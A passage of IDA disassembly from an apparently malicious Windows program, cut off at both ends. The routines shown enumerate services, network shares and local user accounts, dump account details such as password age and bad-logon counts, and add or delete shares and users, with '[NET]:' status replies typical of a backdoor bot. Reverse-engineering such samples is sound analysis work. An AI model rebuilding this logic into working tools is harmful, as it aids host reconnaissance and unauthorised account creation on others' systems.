push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_407618
; ---------------------------------------------------------------------------
loc_407594: ; CODE XREF: sub_4074FB+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_40759B: ; CODE XREF: sub_4074FB+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075A2: ; CODE XREF: sub_4074FB+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075A9: ; CODE XREF: sub_4074FB+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075B0: ; CODE XREF: sub_4074FB+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_407626 ; default
; jumptable 004075CD cases 1,5,6,8,9,12,13,15,16
jz short loc_407613
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_407626 ; default
; jumptable 004075CD cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_407667[ecx]
jmp ds:off_40763F[ecx*4] ; switch jump
loc_4075D4: ; DATA XREF: .text:off_40763F�o
push offset aTheSpecifiedDa ; jumptable 004075CD case 7
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075DB: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheServiceDepe ; jumptable 004075CD case 17
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075E2: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheServiceDe_0 ; jumptable 004075CD case 10
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075E9: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheServiceHasB ; jumptable 004075CD case 0
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075F0: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheSpecified_0 ; jumptable 004075CD case 2
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075F7: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheServiceCoul ; jumptable 004075CD case 11
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_4075FE: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheServiceHa_0 ; jumptable 004075CD case 14
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_407605: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheRequested_1 ; jumptable 004075CD case 3
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_40760C: ; CODE XREF: sub_4074FB+D2�j
; DATA XREF: .text:off_40763F�o
push offset aTheServiceHasN ; jumptable 004075CD case 4
jmp short loc_407618
; ---------------------------------------------------------------------------
loc_407613: ; CODE XREF: sub_4074FB+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_407618: ; CODE XREF: sub_4074FB+41�j
; sub_4074FB+4B�j ...
push offset byte_42EEE4 ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_407639
; ---------------------------------------------------------------------------
loc_407626: ; CODE XREF: sub_4074FB+36�j
; sub_4074FB+89�j ...
push eax ; default
; jumptable 004075CD cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset byte_42EEE4 ; Dest
call _sprintf
add esp, 0Ch
loc_407639: ; CODE XREF: sub_4074FB+129�j
mov eax, offset byte_42EEE4
retn
sub_4074FB endp
; ---------------------------------------------------------------------------
off_40763F dd offset loc_4075E9 ; DATA XREF: sub_4074FB+D2�r
dd offset loc_4075F0 ; jump table for switch statement
dd offset loc_407605
dd offset loc_40760C
dd offset loc_4075D4
dd offset loc_4075E2
dd offset loc_4075F7
dd offset loc_4075FE
dd offset loc_4075DB
dd offset loc_407626
byte_407667 db 0, 9, 1, 2 ; DATA XREF: sub_4074FB+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407679(int,char *Str,int)
sub_407679 proc near ; CODE XREF: sub_409557+191E�p
var_38C = dword ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_42EBA8 ; OpenSCManagerA
push ebx ; int
mov [ebp+var_C], eax
push [ebp+arg_8] ; int
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
loc_4076B1: ; CODE XREF: sub_407679+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_42EB78 ; EnumServicesStatusA
test eax, eax
jnz short loc_4076EB
call ds:dword_41B060 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_40779F
loc_4076EB: ; CODE XREF: sub_407679+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_407796
lea esi, [ebp+var_188]
loc_4076FC: ; CODE XREF: sub_407679+117�j
mov eax, [esi+8]
dec eax
jz short loc_407745
dec eax
jz short loc_40773E
dec eax
jz short loc_407737
dec eax
jz short loc_407730
dec eax
jz short loc_407729
dec eax
jz short loc_407722
dec eax
jz short loc_40771B
push offset aUnknown_0 ; " Unknown"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_40771B: ; CODE XREF: sub_407679+99�j
push offset aPaused ; " Paused"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_407722: ; CODE XREF: sub_407679+96�j
push offset aPausing ; " Pausing"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_407729: ; CODE XREF: sub_407679+93�j
push offset aContinuing ; " Continuing"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_407679+90�j
push offset aRunning ; " Running"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_407737: ; CODE XREF: sub_407679+8D�j
push offset aStoping ; " Stoping"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_40773E: ; CODE XREF: sub_407679+8A�j
push offset aStarting ; " Starting"
jmp short loc_40774A
; ---------------------------------------------------------------------------
loc_407745: ; CODE XREF: sub_407679+87�j
push offset aStopped ; " Stopped"
loc_40774A: ; CODE XREF: sub_407679+A0�j
; sub_407679+A7�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dest]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+var_38C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_4076FC
loc_407796: ; CODE XREF: sub_407679+77�j
cmp [ebp+var_8], ebx
jnz loc_4076B1
loc_40779F: ; CODE XREF: sub_407679+6C�j
push [ebp+var_C]
call dword_42EAC8 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_407679 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4077B6(int,char *Str,int)
sub_4077B6 proc near ; CODE XREF: sub_409557:loc_40AF2C�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Str]
test edi, edi
jz loc_40784F
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_4077DF
dec eax
jnz short loc_40782F
push edi
push 0
call sub_407921
pop ecx
pop ecx
jmp short loc_40782B
; ---------------------------------------------------------------------------
loc_4077DF: ; CODE XREF: sub_4077B6+18�j
cmp [ebp+arg_8], 0
jnz short loc_40781D
push 24h ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_40781D
push 57h
pop eax
loc_4077F6: ; CODE XREF: sub_4077B6+77�j
push eax
call sub_4080F9
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_42F1A0
push off_4210E0[eax*4]
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi ; Dest
call _sprintf
add esp, 18h
jmp short loc_40786F
; ---------------------------------------------------------------------------
loc_40781D: ; CODE XREF: sub_4077B6+2D�j
; sub_4077B6+3B�j
push [ebp+arg_8] ; int
push edi ; Str
push 0 ; int
call sub_407875
add esp, 0Ch
loc_40782B: ; CODE XREF: sub_4077B6+27�j
test eax, eax
jnz short loc_4077F6
loc_40782F: ; CODE XREF: sub_4077B6+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_42F1A0
push off_4210E4[eax*4]
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_40786F
; ---------------------------------------------------------------------------
loc_40784F: ; CODE XREF: sub_4077B6+A�j
mov eax, [ebp+arg_0]
mov esi, offset byte_42F1A0
lea eax, [eax+eax*2]
push off_4210E0[eax*4]
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_40786F: ; CODE XREF: sub_4077B6+65�j
; sub_4077B6+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_4077B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407875(int,char *Str,int)
sub_407875 proc near ; CODE XREF: sub_4077B6+6D�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_4078E0
push [ebp+Str]
mov edi, eax
call sub_4078E0
push 24h ; Val
mov [ebp+var_20], eax
push [ebp+Str] ; Str
call _strchr
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_4078E0
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_42EAC4
pop edi
leave
retn
sub_407875 endp
; =============== S U B R O U T I N E =======================================
sub_4078E0 proc near ; CODE XREF: sub_407875+A�p
; sub_407875+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_4078ED
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4078ED: ; CODE XREF: sub_4078E0+9�j
push ebx
push esi
mov esi, ds:dword_41B044
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_4078E0 endp
; =============== S U B R O U T I N E =======================================
sub_407921 proc near ; CODE XREF: sub_4077B6+20�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4078E0
push [esp+8+arg_4]
mov esi, eax
call sub_4078E0
pop ecx
pop ecx
push 0
push eax
push esi
call dword_42EAA0
pop esi
retn
sub_407921 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407944(int,char *Str,int,int)
sub_407944 proc near ; CODE XREF: sub_409557+1A01�p
Dest = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_4078E0
xor esi, esi
mov [ebp+var_C], eax
push esi ; int
mov [ebp+arg_C], esi
push [ebp+arg_8] ; int
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 18h
loc_40797D: ; CODE XREF: sub_407944+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_42EB10
mov ebx, eax
cmp ebx, esi
jz short loc_4079E0
cmp ebx, 0EAh
jz short loc_4079E0
push ebx
push ebx
call sub_4080F9
pop ecx
push eax
lea eax, [ebp+Dest]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 24h
jmp short loc_407A4D
; ---------------------------------------------------------------------------
loc_4079E0: ; CODE XREF: sub_407944+5D�j
; sub_407944+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_407A44
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_4079EE: ; CODE XREF: sub_407944+FC�j
push dword ptr [esi+10h]
call dword_42EAB8 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_407A05
mov eax, offset aNo ; "No"
loc_407A05: ; CODE XREF: sub_407944+BA�j
push eax
lea eax, [ebp+Dest]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_4079EE
xor esi, esi
loc_407A44: ; CODE XREF: sub_407944+A2�j
push [ebp+var_4]
call dword_42EC40
loc_407A4D: ; CODE XREF: sub_407944+9A�j
cmp ebx, 0EAh
jz loc_40797D
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_407944 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407A65(int,int,int,int,char *Str,int)
sub_407A65 proc near ; CODE XREF: sub_409557:loc_40AFCE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Str = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_407B09
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_407AA7
dec eax
jz short loc_407A9C
dec eax
jnz short loc_407AC2
push [ebp+arg_14] ; int
push [ebp+Str] ; Str
push [ebp+arg_C] ; int
push ebx ; int
push edi ; int
call sub_407BAB
add esp, 14h
jmp short loc_407ABE
; ---------------------------------------------------------------------------
loc_407A9C: ; CODE XREF: sub_407A65+1D�j
push ebx
push edi
call sub_407B8A
pop ecx
pop ecx
jmp short loc_407ABE
; ---------------------------------------------------------------------------
loc_407AA7: ; CODE XREF: sub_407A65+1A�j
cmp [ebp+arg_8], edi
jz short loc_407ABB
push [ebp+arg_8]
push ebx
push edi
call sub_407B30
add esp, 0Ch
jmp short loc_407ABE
; ---------------------------------------------------------------------------
loc_407ABB: ; CODE XREF: sub_407A65+45�j
push 57h
pop eax
loc_407ABE: ; CODE XREF: sub_407A65+35�j
; sub_407A65+40�j ...
cmp eax, edi
jnz short loc_407AE2
loc_407AC2: ; CODE XREF: sub_407A65+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_42F3A4
push off_4210E4[eax*4]
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_407B29
; ---------------------------------------------------------------------------
loc_407AE2: ; CODE XREF: sub_407A65+5B�j
push eax
call sub_4080F9
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_42F3A4
push off_4210E0[eax*4]
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi ; Dest
call _sprintf
add esp, 18h
jmp short loc_407B29
; ---------------------------------------------------------------------------
loc_407B09: ; CODE XREF: sub_407A65+D�j
mov eax, [ebp+arg_0]
mov esi, offset byte_42F3A4
lea eax, [eax+eax*2]
push off_4210E0[eax*4]
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_407B29: ; CODE XREF: sub_407A65+7B�j
; sub_407A65+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B30 proc near ; CODE XREF: sub_407A65+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_4078E0
push [ebp+arg_4]
mov edi, eax
call sub_4078E0
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_4078E0
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_42EAA8
pop edi
leave
retn
sub_407B30 endp
; =============== S U B R O U T I N E =======================================
sub_407B8A proc near ; CODE XREF: sub_407A65+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4078E0
push [esp+8+arg_4]
mov esi, eax
call sub_4078E0
pop ecx
pop ecx
push eax
push esi
call dword_42EA9C
pop esi
retn
sub_407B8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407BAB(int,int,int,char *Str,int)
sub_407BAB proc near ; CODE XREF: sub_407A65+2D�p
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_4078E0
push [ebp+arg_4]
mov esi, eax
call sub_4078E0
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_42EC08
test eax, eax
mov [ebp+arg_0], eax
jnz loc_407F38
mov eax, [ebp+var_4]
test eax, eax
jz loc_407F73
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+Dest]
push offset aAccountS ; "Account: %S"
push eax ; Dest
call _sprintf
mov esi, [ebp+arg_10]
mov edi, [ebp+Str]
mov ebx, [ebp+arg_8]
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+Dest]
push offset aFullNameS ; "Full Name: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+Dest]
push offset aUserCommentS ; "User Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+Dest]
push offset aCommentS ; "Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_407CC4
dec eax
jz short loc_407CBD
dec eax
jz short loc_407CB6
mov eax, offset aUnknown ; "Unknown"
jmp short loc_407CC9
; ---------------------------------------------------------------------------
loc_407CB6: ; CODE XREF: sub_407BAB+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_407CC9
; ---------------------------------------------------------------------------
loc_407CBD: ; CODE XREF: sub_407BAB+FF�j
mov eax, offset aUser_0 ; "User"
jmp short loc_407CC9
; ---------------------------------------------------------------------------
loc_407CC4: ; CODE XREF: sub_407BAB+FC�j
mov eax, offset aGuest ; "Guest"
loc_407CC9: ; CODE XREF: sub_407BAB+109�j
; sub_407BAB+110�j ...
push eax
lea eax, [ebp+Dest]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+Dest]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+Dest]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+Dest]
push offset aParametersS ; "Parameters: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+Dest]
push offset aPasswordAgeD ; "Password Age: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+Dest]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+Dest]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+Dest]
push offset aLastLogonD ; "Last Logon: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+Dest]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+Dest]
push offset aLogonServerS ; "Logon Server: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+Dest]
push offset aWorkstationsS ; "Workstations: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+Dest]
push offset aCountryCodeD ; "Country Code: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+Dest]
push offset aUserSLanguageD ; "User's Language: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+Dest]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+Dest]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_405E64
add esp, 20h
pop edi
pop ebx
jmp short loc_407F64
; ---------------------------------------------------------------------------
loc_407F38: ; CODE XREF: sub_407BAB+35�j
push eax
lea eax, [ebp+Dest]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_10] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_8] ; int
call sub_405E64
add esp, 20h
loc_407F64: ; CODE XREF: sub_407BAB+38B�j
cmp [ebp+var_4], 0
jz short loc_407F73
push [ebp+var_4]
call dword_42EC40
loc_407F73: ; CODE XREF: sub_407BAB+40�j
; sub_407BAB+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_407BAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407F79(int,char *Str,int,int)
sub_407F79 proc near ; CODE XREF: sub_409557+1AA3�p
Dest = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_4078E0
push esi ; int
mov [ebp+var_14], eax
push [ebp+arg_8] ; int
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 18h
loc_407FB8: ; CODE XREF: sub_407F79+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_42EB28
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_408019
cmp eax, 0EAh
jz short loc_408019
push eax
push eax
call sub_4080F9
pop ecx
push eax
lea eax, [ebp+Dest]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 24h
jmp short loc_408094
; ---------------------------------------------------------------------------
loc_408019: ; CODE XREF: sub_407F79+62�j
; sub_407F79+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_4080A7
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_408094
loc_40802B: ; CODE XREF: sub_407F79+ED�j
cmp edi, esi
jz short loc_40806A
push dword ptr [edi]
lea eax, [ebp+Dest]
push offset aS_4 ; " %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
